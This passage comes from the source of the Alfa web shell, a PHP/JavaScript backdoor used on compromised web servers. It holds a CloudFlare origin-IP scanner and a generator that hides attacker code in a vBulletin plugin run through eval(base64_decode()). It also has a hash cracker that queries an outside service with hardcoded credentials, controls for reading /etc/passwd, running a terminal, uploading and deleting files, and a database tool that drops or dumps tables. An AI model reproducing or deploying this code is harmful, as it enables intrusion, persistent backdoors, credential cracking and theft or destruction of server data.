type=\'submit\' name=\'go\' value=\' \' /></p></form></center>";\r\nif($_POST[\'alfa2\'] && $_POST[\'alfa2\'] == \'>>\'){\r\n$url = $_POST[\'alfa1\'];\r\nif(!preg_match(\'/^(https?):\\/\\/(w{3}|w3)\\./i\', $url)){\r\n$url = preg_replace(\'/^(https?):\\/\\//\', \'\', $url);\r\n$url = "http://www.".$url;\r\n}\r\n$headers = @get_headers($url, 1);\r\n$server = $headers[\'Server\'];\r\n$subs = array(\'owa.\',\'2tty.\',\'m.\',\'gw.\',\'mx1.\',\'store.\',\'1\',\'2\',\'vb.\',\'news.\',\'download.\',\'video\',\'cpanel.\', \'ftp.\', \'server1.\', \'cdn.\', \'cdn2.\', \'ns.\', \'ns3.\', \'mail.\', \'webmail.\', \'direct.\', \'direct-connect.\', \'record.\', \'ssl.\', \'dns.\', \'help.\', \'blog.\', \'irc.\', \'forum.\', \'dl.\', \'my.\', \'cp.\', \'portal.\', \'kb.\', \'support.\',\'search.\', \'docs.\', \'files.\', \'accounts.\', \'secure.\', \'register.\', \'apps.\', \'beta.\', \'demo.\', \'smtp.\', \'ns2.\', \'ns1.\', \'server.\', \'shop.\', \'host.\', \'web.\', \'cloud.\', \'api.\', \'exchange.\', \'app.\', \'vps.\', \'owa.\', \'sat.\', \'bbs.\', \'movie.\', \'music.\', \'art.\', \'fusion.\', \'maps.\', \'forums.\', \'acc.\', \'cc.\', \'dev.\', \'ww42.\', \'wiki.\', \'clients.\', \'client.\',\'books.\',\'answers.\',\'service.\',\'groups.\',\'images.\',\'upload.\',\'up.\',\'tube.\',\'users.\',\'admin.\',\'administrator.\',\'private.\',\'design.\',\'whmcs.\',\'wp.\',\'wordpress.\',\'joomla.\',\'vbulletin.\',\'test.\',\'developer.\',\'panel.\',\'contact.\');\r\nif(preg_match(\'/^(https?):\\/\\/(w{3}|w3)\\./i\', $url, $matches)){\r\nif($matches[2] != \'www\'){$url = preg_replace(\'/^(https?):\\/\\//\', \'\', $url);}else{\r\n$url = explode($matches[0], $url);\r\n$url = $url[1];}}\r\nif(is_array($server))$server = $server[0];\r\necho __pre();\r\nif(preg_match(\'/cloudflare/i\', $server))\r\necho "\\n[+] CloudFlare detected: {$server}\\n<br>";\r\nelse\r\necho "\\n[+] CloudFlare wasn\'t detected, proceeding anyway.\\n";\r\necho \'[+] CloudFlare IP: \' . is_ipv4(gethostbyname($url)) . "\\n\\n<br><br>";\r\necho "[+] Searching for more IP addresses.\\n\\n<br><br>";\r\nfor($x=0;$x<count($subs);$x++){\r\n$site = $subs[$x] . $url;\r\n$ip = is_ipv4(gethostbyname($site));\r\nif($ip == \'(Null)\')\r\ncontinue;\r\necho "Trying {$site}: {$ip}\\n<br>";\r\n}\r\necho "\\n[+] Finished.\\n<br>";\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction is_ipv4($ip){\r\nreturn filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : \'(Null)\';\r\n}\r\nfunction __alert($s){\r\necho \'<center>\'.__pre().$s.\'</center>\';\r\n}\r\nfunction create_table($data){\r\necho \'<table border="1">\';\r\nforeach ($data as $key => $val){\r\n$array = array();\r\nforeach($val as $k => $v){\r\n$array[$k] = $v;\r\n}\r\necho "<tr><td><div class=\'tbltxt\'>".$array[\'tdName\']."</div></td><td><input type=\'text\' id=\'".$array[\'id\']."\' name=\'".$array[\'inputName\']."\' ".($array[\'placeholder\']?\'placeholder\':\'value\')."=\'".$array[\'inputValue\']."\' size=\'".$array[\'inputSize\']."\' ".($array[\'disabled\']?\'disabled\':\'\')."></td></tr>";\r\n}\r\necho \'</table>\';\r\n}\r\nfunction alfaphp2xml(){\r\nalfahead();\r\nAlfaNum(8,9,10,7,6,5,4,3);\r\necho "<div class=header><center><p><div class=\'txtfont_header\'>| Shell For vBulletin |</div></p><form onsubmit=\\"g(\'php2xml\',null,this.code.value,\'>>\'); return false;\\" method=\'post\'>\r\n<p><br><textarea rows=\'12\' cols=\'70\' type=\'text\' name=\'code\' placeholder=\\"insert your shell code\\"></textarea><br/><br/>\r\n<input type=\'submit\' name=\'go\' value=\' \' /></p></form></center>";\r\nif($_POST[\'alfa2\']&&$_POST[\'alfa2\']==\'>>\'){\r\necho __pre()."<p><center><textarea rows=\'10\' name=\'users\' cols=\'80\'>";\r\necho \'<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\\\'PHP_SELF\\\'],"subscriptions.php")){eval(base64_decode(\\\'\'.__ZW5jb2Rlcg($_POST[\'alfa1\']).\'\\\'));exit;}]]></phpcode></plugin></plugins>\';\r\necho \'</textarea></center></p>\';\r\n}\r\necho \'</center></div>\';\r\nalfafooter();\r\n}\r\nfunction alfacpcrack(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'cpcrack\\\',null,\\\'dec\\\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\\\'cpcrack\\\',null,\\\'analyzer\\\')">| Hash Analyzer | </a></h3></center>\';\r\nif($_POST[\'alfa1\']==\'dec\'){\r\n$algorithms = array(\'md5\'=>\'MD5\',\'md4\'=>\'MD4\',\'sha1\'=>\'SHA1\',\'sha256\'=>\'SHA256\',\'sha384\'=>\'SHA384\',\'sha512\'=>\'SHA512\',\'ntlm\'=>\'NTLM\');\r\necho \'<center><div class="txtfont_header">| DeCrypter |</div><br><br>\r\n<form onsubmit="g(\\\'cpcrack\\\',null,\\\'dec\\\',this.md5.value,\\\'>>\\\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">\';\r\nforeach($algorithms as $key=>$val){echo(\'<option value="\'.$key.\'">\'.$val.\'</option>\');}\r\necho\'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>\';\r\nif($_POST[\'alfa3\'] == \'>>\'){\r\n$hash = $_POST[\'alfa2\'];\r\nif(!empty($hash)){\r\n$hash_type = $_POST[\'alfa4\'];\r\n$email = "google@gmail.com";\r\n$code = "7b9fa79f92c3cd96";\r\n$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;\r\n$resp = @file_get_contents($target);\r\nif($resp==\'\'){\r\n$get = new AlfaCURL();\r\n$resp = $get->Send($target);\r\n}\r\necho __pre().\'<center>\';\r\nswitch($resp){\r\n\tcase(\'CODE ERREUR : 001\'):echo "<b><font color=\'red\'>You exceeded the 400 allowed request per day</font></b>";break;\r\n\tcase(\'CODE ERREUR : 003\'):echo "<b><font color=\'red\'>Your request includes more than 400 hashes.</font></b>";break;\r\n\tcase(\'CODE ERREUR : 004\'):echo "<b><font color=\'red\'>The type of hash you provide in the argument hash_type doesn\'t seem to be valid</font></b>";break;\r\n\tcase(\'CODE ERREUR : 005\'):echo "<b><font color=\'red\'>The hash you provide doesn\'t seem to match with the type of hash you set.</font></b>";break;\r\n}\r\nif(substr($resp,0,4)!=\'CODE\'&&$resp!=\'\'){\r\necho "<b>Result: <font color=\'green\'>".$resp."</font></b>";\r\n}elseif(substr($resp,0,4)!=\'CODE\'){\r\necho "<font color=\'red\'>NoT Found</font><br />";\r\n}\r\necho(\'</center>\');\r\n}\r\n}\r\n}\r\nif($_POST[\'alfa1\']==\'analyzer\'){\r\necho \'<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>\r\n<form onsubmit="g(\\\'cpcrack\\\',null,\\\'analyzer\\\',this.hash.value,\\\'>>\\\');return false;">\r\n<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>\';\r\nif($_POST[\'alfa3\'] == \'>>\'){\r\n$hash = $_POST[\'alfa2\'];\r\nif(!empty($hash)){\r\n$curl = new AlfaCURL();\r\n$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");\r\necho(__pre().\'<center>\');\r\nif(preg_match(\'#<fieldset class="trouve">(.*?)</fieldset>#\',$resp,$s)){\r\n\techo(\'<font color="green">\'.$s[1].\'</font>\');\r\n}else{\r\n\techo(\'<font color="red">Not Found...!</font>\');\r\n}\r\necho(\'</center><br>\');\r\n}\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfafooter(){\r\nif(!isset($_POST[\'ajax\'])){\r\necho "<table class=\'foot\' width=\'100%\' border=\'0\' cellspacing=\'3\' cellpadding=\'0\' >\r\n<tr>\r\n<td width=\'17%\'><form onsubmit=\\"if(this.f.value.trim().length==0)return false;editor(this.f.value,\'mkfile\',\'\',\'\',\'\',\'file\');this.f.value=\'\';return false;\\"><span class=\'footer_text\'>Make File : </span><br><input class=\'dir\' type=\'text\' name=\'f\' value=\'\'> <input type=\'submit\' value=\' \'></form></td>\r\n<td width=\'21%\'><form onsubmit=\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);this.d.value=\'\';return false;\\"><span class=\'footer_text\'>Make Dir : </span><br><input class=\'dir\' type=\'text\' name=\'d\' value=\' \'> <input type=\'submit\' value=\' \'></form></td>\r\n<td width=\'22%\'><form onsubmit=\\"g(\'FilesMan\',null,\'delete\',this.del.value);this.del.value=\'\';return false;\\"><span class=\'footer_text\'>Delete : </span><br><input class=\'dir\' type=\'text\' name=\'del\' value=\' \'> <input type=\'submit\' value=\' \'></form></td>\r\n<td width=\'19%\'><form onsubmit=\\"if(this.f.value.trim().length==0)return false;editor(this.f.value,\'chmod\',\'\',\'\',\'\',\'none\');this.f.value=\'\';return false;\\"><span class=\'footer_text\'>Chmod : </span><br><input class=\'dir\' type=text name=f value=\' \'> <input type=\'submit\' value=\' \'></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\'2\'><form onsubmit=\'g(\\"FilesMan\\",this.c.value,\\"\\");return false;\'><span class=\'footer_text\'>Change Dir : </span><br><input class=\'foottable\' id=\'footer_cwd\' type=\'text\' name=\'c\' value=\'".htmlspecialchars($GLOBALS[\'cwd\'])."\'> <input type=\'submit\' value=\' \'></form></td>\r\n<td colspan=\'2\'><form onsubmit=\\"editor(this.file.value,\'view\',\'\',\'\',\'\',\'file\');return false;\\"><span><span class=\'footer_text\'>Read File : </span></span><br><input class=\'foottable\' type=\'text\' name=\'file\' value=\'/etc/passwd\'> <input type=\'submit\' value=\' \'></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\'4\'><form style=\'margin-top: 10px;\' onsubmit=\\"return false;\\" autocomplete=\'off\'><span><span class=\'footer_text\'>Execute :</span><br><button onClick=\'alfaOpenPhpTerminal();return false;\' class=\'foottable alfa_custom_cmd_btn\'><img style=\'width:28px;vertical-align: middle;\' src=\'http://solevisible.com/icons/menu/terminal.svg\'> Terminal</button><br></form></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\'4\'><form onsubmit=\'u(this);return false;\' name=\'footer_form\' method=\'post\' ENCTYPE=\'multipart/form-data\'>\r\n<input type=\'hidden\' name=\'a\' value=\'FilesMAn\'>\r\n<input type=\'hidden\' name=\'c\' value=\'" . $GLOBALS[\'cwd\'] ."\'>\r\n<input type=\'hidden\' name=\'ajax\' value=\'true\'>\r\n<input type=\'hidden\' name=\'alfa1\' value=\'uploadFile\'>\r\n<input type=\'hidden\' name=\'charset\' value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n<span class=\'footer_text\'>Upload file: </span><span><button id=\'addup\' onclick=\'addnewup();return false;\'><b>+</b></button></span><p id=\'pfooterup\'><label class=\'inputfile\' for=\'footerup\'><span id=\'__fnameup\'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id=\'footerup\' class=\'toolsInp\' type=\'file\' name=\'f[]\' onChange=\'handleup(this,0);\' multiple></p><input type=\'submit\' name=\'submit\' value=\' \'></form><div id=\'alfa-copyright\'><span class=\'copyright\'>[ ./AlfaTeam &copy; 2012-".date(\'Y\')." ]</span><br><span><a href=\'javascript:void(0);\' onclick=\'alert(\\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\\");\' style=\'color: #E91E63;text-decoration: none;\'>Donate Us !</a></span> <span style=\'letter-spacing: 2px;color: #dfff00;\'>solevisible[at]gmail.com</span> <span><a style=\'color: #ff6060;text-decoration: none;\' target=\'_blank\' href=\'https://telegram.me/solevisible\'>@solevisible</a></span></div></td>\r\n</tr>\r\n</table>\r\n</div>\r\n\r\n<div id=\'options_window\' style=\'background:rgba(0, 0, 0, 0.69);\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'opt-title\'></div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"options_window\\");\'></div><div onClick=\'editorClose(\\"options_window\\");\' class=\'close-button\'></div></div></div><div style=\'height:100%;\' class=\'content_options_holder\'><div class=\'options_tab\'></div><div class=\'options_content\' style=\'margin-left:14px;margin-right:30px;background:#000;overflow:auto;\'></div></div></div></div>\r\n\r\n<div id=\'database_window\' style=\'background:rgba(0, 0, 0, 0.69);\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'opt-title\'>Sql Manager</div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"database_window\\");\'></div><div onClick=\'editorClose(\\"database_window\\");\' class=\'close-button\'></div></div></div><div class=\'content_options_holder\' style=\'margin-left:14px;margin-right:30px;background:#000;max-height:90%;\'><div class=\'sql-tabs\'></div><div class=\'sql-contents\' style=\'max-height: 85vh;\'></div></div></div></div>\r\n\r\n<div id=\'cgiloader\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'opt-title\'></div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"cgiloader\\");\'></div><div onClick=\'editorClose(\\"cgiloader\\");\' class=\'close-button\'></div></div></div><div id=\'cgiframe\' style=\'position:relative;margin-left:14px;margin-right:30px;\'><div class=\'terminal-tabs\'></div><div style=\'height:90%;\' class=\'terminal-contents\'></div></div></div></div>\r\n<div id=\'editor\' style=\'display:none;\'><div class=\'editor-wrapper\'><div class=\'editor-header\'><div class=\'editor-path\'></div><div class=\'editor-controller\'><div class=\'editor-minimize\' onClick=\'editorMinimize(\\"editor\\");\'></div><div onClick=\'editorClose(\\"editor\\");\' class=\'close-button\'></div></div></div><div onclick=\'historyPanelController(this);\' mode=\'visible\' class=\'history-panel-controller\'><<</div><div class=\'editor-explorer\'><div class=\'hheader\'><div class=\'history-clear\' onclick=\'clearEditorHistory();\'>Clear all</div><div class=\'hheader-text\'>History</div><div class=\'editor-search\'><input type=\'text\' style=\'text-align:center;\' id=\'search-input\' placeholder=\'search\'></div></div><div class=\'history-list\'></div></div><div class=\'editor-modal\'><div class=\'editor-body\'><div class=\'editor-content\'><div class=\'editor-tabs\'></div><div class=\'editor-content-holder\'></div></div></div></div></div></div>\r\n<div id=\'update-content\'></div>\r\n<div id=\'database_window-minimized\' onclick=\'showEditor(\\"database_window\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div class=\'minimized-text\' style=\'top: 15px;\'>Database</div></div></div>\r\n<div id=\'options_window-minimized\' onclick=\'showEditor(\\"options_window\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div style=\'top: 4px;\' class=\'minimized-text\'>Options</div></div></div>\r\n<div id=\'editor-minimized\' onclick=\'showEditor(\\"editor\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div style=\'top: 2px;\' class=\'minimized-text\'>Editor</div></div></div>\r\n<div id=\'cgiloader-minimized\' onclick=\'showEditor(\\"cgiloader\\");\'><div class=\'minimized-wrapper\'><span class=\'options_min_badge\'>0</span><div style=\'top: 12px;\' class=\'minimized-text\'>Cgi Shell</div></div></div>\r\n<div id=\'rightclick_menu\'>\r\n  <a target=\'_blank\' href=\'\' name=\'newtab\'><img src=\\"http://solevisible.com/icons/menu/newtab.svg\\"> Open in new tab</a>\r\n  <a target=\'_blank\' href=\'\' name=\'link\'><img src=\\"http://solevisible.com/icons/menu/link.svg\\"> Open file directly</a>\r\n  <a href=\'javascript:void(0);\' name=\'download\'><img src=\\"http://solevisible.com/icons/menu/download2.svg\\"> Download</a>\r\n  <a href=\'\' name=\'view\'><img src=\\"http://solevisible.com/icons/menu/view.svg\\"> View</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaSyncMenuToOpt(this);\' path=\'\' fname=\'\' name=\'view_archive\'><img src=\\"http://solevisible.com/icons/menu/view.svg\\"> View Archive</a>\r\n  <a href=\'\' name=\'edit\'><img src=\\"http://solevisible.com/icons/menu/edit.svg\\"> Edit</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"move\\");\' ftype=\'\' path=\'\' fname=\'\' href=\'\' href=\'\' name=\'move\'><img src=\\"http://solevisible.com/icons/menu/move.svg\\"> Move</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"copy\\");\' ftype=\'\' path=\'\' fname=\'\' href=\'\' name=\'copy\'><img src=\\"http://solevisible.com/icons/menu/copy.svg\\"> Copy</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"rename\\");\' ftype=\'\' path=\'\' fname=\'\' name=\'rename\'><img src=\\"http://solevisible.com/icons/menu/rename.svg\\">  Rename</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"modify\\");\' ftype=\'\' path=\'\' fname=\'\' name=\'modify\'><img src=\\"http://solevisible.com/icons/menu/time.svg\\">  Modify</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaPopupAction(this, \\"permission\\");\' name=\'permission\'><img src=\\"http://solevisible.com/icons/menu/key.svg\\"> Change Permissions</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaSyncMenuToOpt(this);\' path=\'\' fname=\'\' name=\'compress\'><img src=\\"http://solevisible.com/icons/menu/resize.svg\\"> Compress</a>\r\n  <a href=\'javascript:void(0);\' onclick=\'alfaSyncMenuToOpt(this);\' path=\'\' fname=\'\' name=\'extract\'><img src=\\"http://solevisible.com/icons/menu/increase.svg\\"> Extract</a>\r\n  <a href=\'javascript:void(0);\' name=\'delete\'><img src=\\"http://solevisible.com/icons/menu/delete.svg\\"> Delete</a>\r\n</div>\r\n<div id=\\"filesman-tab-full-path\\"></div>\r\n<div id=\'alert-area\' class=\'alert-area\'></div>\r\n<div class=\'cl-popup-fixed\' style=\'display:none;\'>\r\n\t<div id=\'shortcutMenu-holder\'>\r\n\t\t<div class=\'popup-head\'></div>\r\n\t\t\t<form autocomplete=\'off\' onSubmit=\'return false;\'>\r\n\t\t\t\t<label class=\'old-path-lbl\'></label>\r\n\t\t\t\t<div style=\'overflow: hidden;white-space: nowrap;text-overflow: ellipsis;\' class=\'old-path-content\'></div>\r\n\t\t\t\t<label style=\'margin-top:10px;\' class=\'new-filename-lbl\'>New file name</label>\r\n\t\t\t\t<input type=\'text\' name=\'fname\'>\r\n\t\t\t\t<div class=\'perm-table-holder\'>\r\n\t\t\t\t\t<table>\r\n\t\t\t\t\t   <tbody>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td><b>Mode</b></td>\r\n\t\t\t\t\t         <td>User</td>\r\n\t\t\t\t\t         <td>Group</td>\r\n\t\t\t\t\t         <td>World</td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Read</td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'ur\' value=\'4\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'gr\' value=\'4\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'wr\' value=\'4\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Write</td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'uw\' value=\'2\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'gw\' value=\'2\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'ww\' value=\'2\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Execute</td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'ux\' value=\'1\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'gx\' value=\'1\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t         <td><input type=\'checkbox\' name=\'wx\' value=\'1\' onclick=\'calcperm();\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Permission</td>\r\n\t\t\t\t\t         <td><input style=\'width:60px;\' type=\'text\' name=\'u\' maxlength=\'1\' oninput=\'this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \\"u\\", [\\"u\\"]);\'></td>\r\n\t\t\t\t\t         <td><input style=\'width:60px;\' type=\'text\' name=\'g\' maxlength=\'1\' oninput=\'this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \\"g\\", [\\"g\\"]);\'></td>\r\n\t\t\t\t\t         <td><input style=\'width:60px;\' type=\'text\' name=\'w\' maxlength=\'1\' oninput=\'this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \\"w\\", [\\"w\\"]);\'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t   </tbody>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\r\n\t\t\t</form>\r\n\t\t<div class=\'popup-foot\'>\r\n\t\t\t<button style=\'background: #2b5225;\' name=\'accept\' action=\'\' onclick=\'alfaPopUpDoAction(this);\'></button>\r\n\t\t\t<button style=\'background: #9e2c2c;\' onclick=\'d.querySelector(\\".cl-popup-fixed\\").style.display=\\"none\\";\'>Cancell</button>\r\n\t\t</div>\r\n\t</div>\r\n</div>";?>\r\n<script>\r\nfunction alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\\\[\\\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\\\[\\\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href=\'javascript:void(0);\' onclick=\'g(\\"FilesTools\\",null,\\""+s+\'","download");\\\'><span>Download: \'+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r=\'<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="\'+a+\'" placeholder="Filter Table" target=".cls-\'+i+\'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>\';for(var o in e)null!=e[o]&&(r+="<li><div class=\'block\'><i></i><b></b></div><div class=\'tables-row\'><input type=\'checkbox\' name=\'tbl[]\' value=\'"+e[o].name+"\'>&nbsp;<a class=\'db-opt-id\' db_target=\'"+i+"\' db_id=\'"+a+"\' href=\'javascript:void(0);\' onclick=\\"alfaLoadTableData(this, \'"+e[o].name+"\')\\"><span class=\'mysql_tables\' style=\'font-weight:unset;\'>"+e[o].name+"</span></a>"+(l?" <small><span style=\'font-weight:unset;\' class=\'mysql_table_count\'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+=\'</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="\'+a+\'" class="db-opt-id" target=".cls-\'+i+\'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="\'+a+\'" target=".cls-\'+i+\'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="\'+a+\'" class="db-opt-id" db_target="\'+i+\'" target=".cls-\'+i+\'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>\',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" 